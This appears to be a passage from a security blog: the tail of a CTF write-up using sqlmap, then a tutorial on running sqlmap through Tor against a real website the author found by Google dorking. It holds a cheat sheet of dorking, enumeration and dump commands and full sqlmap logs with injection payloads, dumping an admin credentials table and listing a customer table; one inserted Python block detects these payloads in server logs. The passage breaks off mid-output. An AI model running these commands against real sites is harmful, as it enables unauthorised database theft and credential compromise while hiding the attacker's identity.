Hint: Since you’ve come this far already, the only hint we’ll give you is that the hash is still located in the ‘hash’ field of table with a random name, but some things have changed…

I just remember this challenge was crazy because there were a lot of random tables; in the end I used sqlmap to get the hash.

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://vulnerable.com:2559/level5/index.php?id=1 --cookie=PHPSESSID=3f26c508d1417857414693b70afb89c4 --dbs

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:31:36
[13:31:36] [INFO] resuming back-end DBMS 'mysql'
[13:31:36] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2356=2356

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 3092 FROM(SELECT COUNT(*),CONCAT(0x3a647a6b3a,(SELECT (CASE WHEN (3092=3092) THEN 1 ELSE 0 END)),0x3a786d673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
[13:31:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 5.0 (lenny)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[13:31:36] [INFO] fetching database names
[13:31:37] [INFO] the SQL query used returns 2 entries
[13:31:36] [INFO] resumed: information_schema
[13:31:36] [INFO] resumed: level5
available databases [2]:
[*] information_schema
[*] level5
[13:31:37] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/vulnerable.com'
[*] shutting down at 13:31:37
root@bt:/pentest/database/sqlmap # python sqlmap.py -u http://vulnerable.com:2559/level5/index.php?id=1 --cookie=PHPSESSID=3f26c508d1417857414693b70afb89c4 -D level5 --tables --threads 5
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:31:04
[13:31:04] [INFO] resuming back-end DBMS 'mysql'
[13:31:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2356=2356
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 3092 FROM(SELECT COUNT(*),CONCAT(0x3a647a6b3a,(SELECT (CASE WHEN (3092=3092) THEN 1 ELSE 0 END)),0x3a786d673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
[13:31:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 5.0 (lenny)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[13:31:04] [INFO] fetching tables for database: 'level5'
[13:31:04] [INFO] the SQL query used returns 9 entries
[13:31:04] [INFO] starting 5 threads
[13:31:04] [INFO] resumed: 1d41a7bf4ef7c3e22209fa5f634b893c
[13:31:04] [INFO] resumed: 2201968221c2da69e5e0b505caf6beaf
[13:31:04] [INFO] resumed: 77c0fb751bab92f439856b186c42a4f3
[13:31:04] [INFO] resumed: 8c29366e3aaf6dd1d50f86a2f13bfbb9
[13:31:04] [INFO] resumed: 8f83d8236fb0bcc549eb3f4de3118907
[13:31:04] [INFO] resumed: f0f94891cd7e034efc52b485c687e5bb
[13:31:04] [INFO] resumed: fbc59e23783a8344548f20bd5b578729
[13:31:04] [INFO] resumed: products
[13:31:04] [INFO] resumed: ffeaef8dbe103dbc693d98b90dfba109
Database: level5
[9 tables]
+----------------------------------+
| 1d41a7bf4ef7c3e22209fa5f634b893c |
| 2201968221c2da69e5e0b505caf6beaf |
| 77c0fb751bab92f439856b186c42a4f3 |
| 8c29366e3aaf6dd1d50f86a2f13bfbb9 |
| 8f83d8236fb0bcc549eb3f4de3118907 |
| f0f94891cd7e034efc52b485c687e5bb |
| fbc59e23783a8344548f20bd5b578729 |
| ffeaef8dbe103dbc693d98b90dfba109 |
| products                         |
+----------------------------------+
[13:31:04] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/vulnerable.com'
[*] shutting down at 13:31:04
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://vulnerable.com:2559/level5/index.php?id=1 --cookie=PHPSESSID=3f26c508d1417857414693b70afb89c4 -D level5 -T 2201968221c2da69e5e0b505caf6beaf --dump --threads 5

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:33:11

[13:33:11] [INFO] resuming back-end DBMS 'mysql'
[13:33:11] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2356=2356

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 3092 FROM(SELECT COUNT(*),CONCAT(0x3a647a6b3a,(SELECT (CASE WHEN (3092=3092) THEN 1 ELSE 0 END)),0x3a786d673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---

[13:33:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 5.0 (lenny)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[13:33:11] [INFO] fetching columns for table '2201968221c2da69e5e0b505caf6beaf' in database 'level5'
[13:33:11] [INFO] the SQL query used returns 1 entries
[13:33:11] [INFO] resumed: hash
[13:33:11] [INFO] resumed: text
[13:33:11] [INFO] fetching entries for table '2201968221c2da69e5e0b505caf6beaf' in database 'level5'
[13:33:11] [INFO] the SQL query used returns 1 entries
[13:33:11] [INFO] resumed: f647e64fbcc1bce7995b084333c981baa4d57071
[13:33:11] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'hash'. Do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: level5
Table: 2201968221c2da69e5e0b505caf6beaf
[1 entry]
+------------------------------------------+
| hash                                     |
+------------------------------------------+
| f647e64fbcc1bce7995b084333c981baa4d57071 |
+------------------------------------------+

[13:33:15] [INFO] table 'level5.2201968221c2da69e5e0b505caf6beaf' dumped to CSV file '/pentest/database/sqlmap/output/vulnerable.com/dump/level5/2201968221c2da69e5e0b505caf6beaf.csv'
[13:33:15] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/vulnerable.com'

[*] shutting down at 13:33:15
Categories: SQLinjection, Wargame-CTF Tags:

SQLi I : SQLmap & Tor (I)

Thursday, 21 February 2013 3 comments
sql_injection
Hi everybody, this is the first entry about SQL injections; I hope to write about automation, manual techniques, cracking, anonymity and much more. Today I would like to discuss SQL injections using the Tor SOCKS5 proxy. Anyway, this entry is not about setting up the Tor proxy, nor about explaining SQL injections; it just recalls a few useful commands for when you must use SQLmap and Tor. This post is just an introduction to the use of automated SQL injection tools and how to try to hide ourselves. For that, I have taken a vulnerable website which I found by searching on Google, because I did not want to attack anywhere in particular, so I have hidden the real data; anyway it is a good practical example for learning how to use SQLmap and Tor. That is not legal unless you have permission, an NDA or something similar.
You can use Bugtraq or BackTrack; both have everything you need. I used Bugtraq :) because I like it more, and Bugtraq has a sqlmap version that colorizes the output, which you can also get with BackTrack if you update it.
Before starting I would like to sum up the methodology in a little cheat sheet; if you have better commands, please feel free to comment them.
I hope that if you take a good look at it you can get the gist. So let's go!
 -=====---======--------=====--==-
| Mini CheatSheet SQLmap &&   Tor | 
 -=====---======--------=====--==-
[*] Quick D0rk      inurl:*target*index.php?id=

# Dorking with SQLmap 
./sqlmap.py -g "inurl:ednolo.alumnos.upv.es*php? site:es" --batch --beep --dbs --random-agent

# Dorking with SQLmap & Tor (Not sure!)
./sqlmap.py -g "inurl:ednolo.alumnos.upv.es*php? site:es" --dbs --random-agent --tor --check-tor --tor-type=SOCKS5

# All commands are using and checking Tor, changing by random user agents and with extra time for proxies in every request 
# You can declare a variable like this : 
tor="--check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent" 
./sqlmap.py -u <url> $tor --dbs --banner 

# Check if url is vulnerable and gather info on target,also it gives us the banner 
# It will check URL to dump DB's with 5 threads and will beep if target is vulnerable.
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent --dbs --banner --beep

# It will enumerate Tables from chosen DB's with 5 threads. 
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> --tables 

# It will enumerate Columns from chosen database with 5 threads. 
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> -T <table> --columns 

# It will dump one Column data. 
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> -T <table> -C <column> --dump 

# It will dump several columns and using --batch will be automatic replies.
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> -T <table> -C <column1,column2> --dump --batch

# It will dump all tables from a database (Watch out!)
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> --tables --dump-all --batch
First, I have to say that the time has been changed in the logs! The hour 25 or 26 never exists; the maximum we know is 23:59. So just look at the main idea.
To start, we can run the first command to find injection points, gather information on the target and also get the banner. I have highlighted the important lines; we can sum them up as follows: the URL is vulnerable, and we are using Tor with the SOCKS protocol correctly. Remember that we have to force sqlmap to use SOCKS with the flag, otherwise we will be using HTTP proxies (check it out with python sqlmap.py -hh).
Finally, we have recovered the database names, and we should look at the payloads to understand the injections better:
# ./sqlmap.py -u "http://vulnerablesite_.com/articless.php?categoria=16" --check-tor --tor  --tor-type=SOCKS5  --time-sec=25 --threads 5 --random-agent --dbs --banner

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 25:51:22

[25:51:22] [WARNING] increasing default value for option '--time-sec' to 50 because switch '--tor' was provided
[25:51:22] [INFO] setting Tor SOCKS proxy settings
[25:51:22] [INFO] fetched random HTTP User-Agent header from file '/bugtraq/tools/web_audit/databases/sqlmap/txt/user-agents.txt': Opera/9.23 (Windows NT 5.1; U; pt)
[25:51:22] [INFO] checking Tor connection
[25:51:23] [INFO] Tor is properly being used
[25:51:23] [INFO] resuming back-end DBMS 'mysql' 
[25:51:23] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: categoria
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoria=16 AND 8616=8616

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: categoria=16 AND (SELECT 5911 FROM(SELECT COUNT(*),CONCAT(0x3a6779693a,(SELECT (CASE WHEN (5911=5911) THEN 1 ELSE 0 END)),0x3a7578613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: categoria=16 AND SLEEP(50)
---
[25:51:25] [INFO] the back-end DBMS is MySQL
[25:51:25] [INFO] fetching banner
[25:51:25] [INFO] resumed: 5.1.66-cll
web application technology: Apache, Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0
banner:    '5.1.66-cll'
[25:51:25] [INFO] fetching database names
[25:51:25] [INFO] the SQL query used returns 2 entries
[25:51:25] [INFO] starting 2 threads
[25:51:25] [INFO] resumed: information_schema
[25:51:25] [INFO] resumed: vulnerable_database
available databases [2]:
[*] vulnerable_database
[*] information_schema

[25:51:25] [INFO] fetched data logged to text files under '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com'

[*] shutting down at 25:51:25
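The three payloads sqlmap reports above (a boolean tautology, the FLOOR(RAND(0)*2) GROUP BY error trick and SLEEP(50)) are also what a defender sees in the web server's access log. The following is an added example, not code from the original post: it URL-decodes the query string of constructed Apache combined-format log lines and flags each payload class; the log lines, IPs and user agents are constructed here.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Apache "combined" log format, as a web server fronting the PHP app writes it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# One signature per payload class reported by sqlmap above, applied to the
# URL-decoded value of every query parameter.
RULES = (
    # "AND 8616=8616": a tautology whose two sides are the same literal.
    ("boolean-based blind",
     re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)),
    # FLOOR(RAND(0)*2) ... GROUP BY: the MySQL duplicate-key error trick.
    ("error-based",
     re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?GROUP\s+BY",
                re.I | re.S)),
    # SLEEP(50): a deliberate delay, the time-based blind probe.
    ("time-based blind",
     re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
)


def classify(value):
    """Return the payload class a decoded parameter value matches, or None."""
    for name, pattern in RULES:
        if pattern.search(value):
            return name
    return None


def scan_log(text):
    """Parse combined-format lines and return one finding per flagged parameter.

    With --tor and --random-agent the source IP and User-Agent change between
    requests, so findings are keyed on the URL parameter, not on the client.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        query = urlsplit(m.group("target")).query
        # parse_qsl URL-decodes: "16%20AND%208616%3D8616" -> "16 AND 8616=8616"
        for param, value in parse_qsl(query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                findings.append({"ip": m.group("ip"), "param": param,
                                 "type": kind, "status": int(m.group("status")),
                                 "value": value[:60]})
    return findings


def _line(ip, value, ua, status):
    """Build a constructed log line carrying `value` in the categoria parameter."""
    return (f'{ip} - - [05/Jun/2014:12:51:23 +0200] '
            f'"GET /articless.php?categoria={quote(value, safe="")} HTTP/1.1" '
            f'{status} 5120 "-" "{ua}"')


# Constructed sample log (not from the original post). The first three lines
# carry the three payloads sqlmap reported above; the last two are benign.
ERROR_PAYLOAD = ("16 AND (SELECT 5911 FROM(SELECT COUNT(*),CONCAT(0x3a6779693a,"
                 "(SELECT (CASE WHEN (5911=5911) THEN 1 ELSE 0 END)),0x3a7578613a,"
                 "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)")
SAMPLE_LOG = "\n".join([
    _line("10.0.0.5", "16 AND 8616=8616", "Opera/9.23 (Windows NT 5.1; U; pt)", 200),
    _line("10.0.0.6", ERROR_PAYLOAD, "Mozilla/5.0 (X11; U; Linux i686)", 500),
    _line("10.0.0.7", "16 AND SLEEP(50)", "Mozilla/5.0 (iPad; U; CPU OS 3_2)", 200),
    _line("10.0.0.9", "16", "Mozilla/5.0", 200),
    _line("10.0.0.9", "sleep and rest", "Mozilla/5.0", 200),
])

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```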
Now let me continue with the injection: we pick vulnerable_database (-D) and ask for its tables (--tables):
# ./sqlmap.py -u "http://vulnerablesite_.com/articless.php?categoria=16" --check-tor --tor  --tor-type=SOCKS5  --time-sec=25 --threads 5 --random-agent  -D vulnerable_database --tables

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 25:53:04

[25:53:04] [WARNING] increasing default value for option '--time-sec' to 50 because switch '--tor' was provided
[25:53:04] [INFO] setting Tor SOCKS proxy settings
[25:53:04] [INFO] fetched random HTTP User-Agent header from file '/bugtraq/tools/web_audit/databases/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090912 Gentoo Firefox/3.5.3 FirePHP/0.3
[25:53:04] [INFO] checking Tor connection
[25:53:06] [INFO] Tor is properly being used
[25:53:06] [INFO] resuming back-end DBMS 'mysql' 
[25:53:06] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: categoria
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoria=16 AND 8616=8616

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: categoria=16 AND (SELECT 5911 FROM(SELECT COUNT(*),CONCAT(0x3a6779693a,(SELECT (CASE WHEN (5911=5911) THEN 1 ELSE 0 END)),0x3a7578613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: categoria=16 AND SLEEP(50)
---
[25:53:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache, Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0
[25:53:08] [INFO] fetching tables for database: 'vulnerable_database'
[25:53:08] [INFO] the SQL query used returns 12 entries
[25:53:08] [INFO] starting 5 threads
[25:53:08] [INFO] resumed: categories
[25:53:08] [INFO] resumed: AdminLogin
[25:53:08] [INFO] resumed: oneTable_hiding_real
[25:53:08] [INFO] resumed: C0mpr4d0r3s
[25:53:08] [INFO] resumed: Marcas
[25:53:08] [INFO] resumed: Comprados_Prod
[25:53:08] [INFO] resumed: Pedidos
[25:53:08] [INFO] resumed: Estilo
[25:53:08] [INFO] resumed: articless
[25:53:08] [INFO] resumed: ciudades
[25:53:08] [INFO] resumed: Subcategories
[25:53:08] [INFO] resumed: paises
Database: vulnerable_database
[12 tables]
+---------------------+
| AdminLogin          |
| oneTable_hiding_real|
| categories          |
| C0mpr4d0r3s         |
| Estilo              |
| Marcas              |
| Pedidos             |
| Comprados_Prod      |
| articless           |
| Subcategories       |
| ciudades            |
| paises              |
+---------------------+

[25:53:08] [INFO] fetched data logged to text files under '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com'

[*] shutting down at 25:53:08
We have obtained 12 tables, and one immediately stands out: AdminLogin (-T AdminLogin --dump). So let's dump that table:
# ./sqlmap.py -u "http://vulnerablesite_.com/articless.php?categoria=16" --check-tor --tor  --tor-type=SOCKS5  --time-sec=25 --threads 5 --random-agent  -D vulnerable_database -T  AdminLogin  --dump

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 25:56:55

[25:56:55] [WARNING] increasing default value for option '--time-sec' to 50 because switch '--tor' was provided
[25:56:55] [INFO] setting Tor SOCKS proxy settings
[25:56:55] [INFO] fetched random HTTP User-Agent header from file '/bugtraq/tools/web_audit/databases/sqlmap/txt/user-agents.txt': Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; es-es) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10
[25:56:55] [INFO] checking Tor connection
[25:56:57] [INFO] Tor is properly being used
[25:56:57] [INFO] resuming back-end DBMS 'mysql' 
[25:56:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: categoria
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoria=16 AND 8616=8616

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: categoria=16 AND (SELECT 5911 FROM(SELECT COUNT(*),CONCAT(0x3a6779693a,(SELECT (CASE WHEN (5911=5911) THEN 1 ELSE 0 END)),0x3a7578613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: categoria=16 AND SLEEP(50)
---
[25:56:59] [INFO] the back-end DBMS is MySQL
web application technology: Apache, Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0
[25:56:59] [INFO] fetching columns for table 'AdminLogin' in database 'vulnerable_database'
[25:56:59] [INFO] the SQL query used returns 4 entries
[25:56:59] [INFO] starting 4 threads
[25:56:59] [INFO] resumed: Adm_Id
[25:56:59] [INFO] resumed: int(10)
[25:56:59] [INFO] resumed: Adm_Usuario
[25:56:59] [INFO] resumed: varchar(255)
[25:56:59] [INFO] resumed: Adm_Clave
[25:56:59] [INFO] resumed: varchar(255)
[25:56:59] [INFO] resumed: Adm_Correo
[25:56:59] [INFO] resumed: varchar(255)
[25:56:59] [INFO] fetching entries for table 'AdminLogin' in database 'vulnerable_database'
[25:56:59] [INFO] the SQL query used returns 1 entries
[25:56:59] [INFO] resumed: HXXXXXXX\xd1XXXXXXXXmjhdJKJDJ
[25:56:59] [INFO] resumed: tiXXXXXXXXXal@vulnerablesite_.com
[25:56:59] [INFO] resumed: 1
[25:56:59] [INFO] resumed: CHANGED987LFT126XertyJKA126
[25:56:59] [INFO] analyzing table dump for possible password hashes
Database: vulnerable_database
Table: AdminLogin
[1 entry]
+--------+--------------------------------------+-----------------------------------+-----------------------------+
| Adm_Id | Adm_Clave                            | Adm_Correo                        | Adm_Usuario                 |
+--------+--------------------------------------+-----------------------------------+-----------------------------+
| 1      | HGXXXX74\xdXXXXXXXXXX738993mjhdJKJDJ | tiXXXXXXXXual@vulnerablesite_.com | CHANGED987LFT126XerXXXXX126 |
+--------+--------------------------------------+-----------------------------------+-----------------------------+

[25:56:59] [INFO] table 'vulnerable_database.AdminLogin' dumped to CSV file '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com/dump/vulnerable_database/AdminLogin.csv'
[25:56:59] [INFO] fetched data logged to text files under '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com'

[*] shutting down at 25:56:59
To tell the truth, it has been easier than manual SQL injection; in this case we already have credentials to log in as Admin, but that will be the next entry in the blog. We have also seen another interesting table, C0mpr4d0r3s, which will hold users, passwords and more. So let's see what columns it has (-D vulnerable_database -T C0mpr4d0r3s --columns):
# ./sqlmap.py -u "http://vulnerablesite_.com/articless.php?categoria=16" --check-tor --tor  --tor-type=SOCKS5  --time-sec=25 --threads 5 --random-agent  -D vulnerable_database -T  C0mpr4d0r3s --columns 

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[*] starting at 26:04:33

[26:04:33] [WARNING] increasing default value for option '--time-sec' to 50 because switch '--tor' was provided
[26:04:33] [INFO] setting Tor SOCKS proxy settings
[26:04:33] [INFO] fetched random HTTP User-Agent header from file '/bugtraq/tools/web_audit/databases/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24
[26:04:33] [INFO] checking Tor connection
[26:04:41] [INFO] Tor is properly being used
[26:04:41] [INFO] resuming back-end DBMS 'mysql' 
[26:04:41] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: categoria
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoria=16 AND 8616=8616

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: categoria=16 AND (SELECT 5911 FROM(SELECT COUNT(*),CONCAT(0x3a6779693a,(SELECT (CASE WHEN (5911=5911) THEN 1 ELSE 0 END)),0x3a7578613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: categoria=16 AND SLEEP(50)
---
[26:04:46] [INFO] the back-end DBMS is MySQL
web application technology: Apache, Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0
[26:04:46] [INFO] fetching columns for table 'C0mpr4d0r3s' in database 'vulnerable_database'
[26:04:46] [INFO] the SQL query used returns 17 entries
[26:04:46] [INFO] starting 5 threads
[26:04:46] [INFO] resumed: Com_Id
[26:04:46] [INFO] resumed: int(10)
[26:04:46] [INFO] resumed: nOMBRE_DKS
[26:04:46] [INFO] resumed: varchar(250)
[26:04:46] [INFO] resumed: com_surnamee
[26:04:46] [INFO] resumed: varchar(250)
[26:04:46] [INFO] resumed: Com_Direccion
[26:04:46] [INFO] resumed: varchar(250)
[26:04:46] [INFO] resumed: Com_company
[26:04:46] [INFO] resumed: varchar(250)
[26:04:46] [INFO] resumed: Com_Documento
[26:04:46] [INFO] resumed: varchar(50)
[26:04:46] [INFO] resumed: fax_com
[26:04:46] [INFO] resumed: varchar(50)
[26:04:46] [INFO] resumed: Com_Pais
[26:04:46] [INFO] resumed: int(10)
[26:04:46] [INFO] resumed: Com_Ciudad
[26:04:46] [INFO] resumed: int(10)
[26:04:46] [INFO] resumed: Com_Email
[26:04:46] [INFO] resumed: varchar(150)
[26:04:46] [INFO] resumed: Com_Telefono
[26:04:46] [INFO] resumed: varchar(50)
[26:04:46] [INFO] resumed: Com_Fecha
[26:04:46] [INFO] resumed: date
[26:04:46] [INFO] resumed: Com_Clave
[26:04:46] [INFO] resumed: varchar(50)
[26:04:46] [INFO] resumed: xyt_ClaveEncriptada
[26:04:46] [INFO] resumed: varchar(255)
[26:04:46] [INFO] resumed: updatenumberattemptt
[26:04:46] [INFO] resumed: int(10)
[26:04:46] [INFO] resumed: thisIsafieldsogreaattt
[26:04:46] [INFO] resumed: date
[26:04:46] [INFO] resumed: Com_Portal
[26:04:46] [INFO] resumed: varchar(150)
Database: vulnerable_database
Table: C0mpr4d0r3s
[17 columns]
+------------------------+--------------+
| Column                 | Type         |
+------------------------+--------------+
| com_surnamee           | varchar(250) |
| Com_Ciudad             | int(10)      |
| Com_Clave              | varchar(50)  |
| xyt_ClaveEncriptada    | varchar(255) |
| Com_Direccion          | varchar(250) |
| Com_Documento          | varchar(50)  |
| Com_Email              | varchar(150) |
| Com_company            | varchar(250) |
| fax_com                | varchar(50)  |
| Com_Fecha              | date         |
| thisIsafieldsogreaattt | date         |
| Com_Id                 | int(10)      |
| nOMBRE_DKS             | varchar(250) |
| updatenumberattemptt   | int(10)      |
| Com_Pais               | int(10)      |
| Com_Portal             | varchar(150) |
| Com_Telefono           | varchar(50)  |
+------------------------+--------------+

[26:04:46] [INFO] fetched data logged to text files under '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com'

[*] shutting down at 26:04:46
After looking at the columns, let's dump all the data of the C0mpr4d0r3s table. Remember that if you are lazy you can always use the flags --dump-all --batch:
those flags dump everything (--dump-all) without asking you anything (--batch).
# ./sqlmap.py -u "http://vulnerablesite_.com/articless.php?categoria=16" --check-tor --tor  --tor-type=SOCKS5  --time-sec=25 --threads 5 --random-agent  -D vulnerable_database -T  C0mpr4d0r3s --columns --dump

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[*] starting at 26:06:56

[26:06:56] [WARNING] increasing default value for option '--time-sec' to 50 because switch '--tor' was provided
[26:06:56] [INFO] setting Tor SOCKS proxy settings
[26:06:56] [INFO] fetched random HTTP User-Agent header from file '/bugtraq/tools/web_audit/databases/sqlmap/txt/user-agents.txt': Opera/9.63 (X11; Linux i686; U; en)
[26:06:56] [INFO] checking Tor connection
[26:06:58] [INFO] Tor is properly being used
[26:06:58] [INFO] resuming back-end DBMS 'mysql' 
[26:06:58] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: categoria
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoria=16 AND 8616=8616

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: categoria=16 AND (SELECT 5911 FROM(SELECT COUNT(*),CONCAT(0x3a6779693a,(SELECT (CASE WHEN (5911=5911) THEN 1 ELSE 0 END)),0x3a7578613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
